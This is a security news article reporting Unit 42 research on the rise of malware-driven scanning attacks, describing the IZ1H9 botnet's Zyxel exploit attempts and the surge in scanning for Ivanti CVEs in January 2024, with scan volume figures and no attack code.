Security researchers at Palo Alto Networks' Unit 42 said they are observing a significant rise in malware-driven scanning attacks, involving the hijacking of infected hosts to conduct scans on targets.
Instead of relying on direct scans, attackers are now leveraging malware-infected hosts to initiate scanning requests, significantly complicating detection and mitigation efforts.
The research identified several key characteristics of this scanning behavior, including the use of infected hosts to generate an unusually high volume of scanning requests. Attackers have also been observed embedding previously unseen URLs for payload delivery or command-and-control (C2) functions within exploit requests, reducing the likelihood of security vendors blocking subsequent malicious payloads or C2 URLs.
Once a device is compromised by malware, it establishes communication with attacker-controlled C2 domains for instructions. Threat actors can then commandeer the infected device's resources to execute scanning attacks on various target domains. These targets can vary based on the attacker's objectives, with specific entities, such as governments, often being prime targets for exploit attempts.
One of the cases highlighted in the research involves the Mirai-based IZ1H9 botnet, which continues to evolve its toolkit for propagation. Unit 42's telemetry revealed attempted exploits targeting a Zyxel remote code execution vulnerability previously reported in 2023. This exploit, aimed at exploiting an insufficient input validation vulnerability in certain versions of the Zyxel router's /bin/zhttpd/ component, facilitates the download of a malicious file to initiate the replication of the Mirai botnet.
One incident occurred on June 19, 2023, when Unit 42 observed an unprecedented surge in the number of unique destinations scanned. Over 2,247 devices were involved in a distributed exploit attempt targeting 15,812 internet service providers (ISPs).
The researchers have also noted a surge in vulnerability scanning for a series of Ivanti flaws (CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893) starting on January 14, 2024.
“On this day, 25,268 unique hosts were scanned by at least 15,645 infected hosts. Only four days after the initial spike, on Jan. 18, 2024, these numbers jumped. We then observed 82,441 unique hosts being scanned by at least 39,658 infected hosts,” the team said.
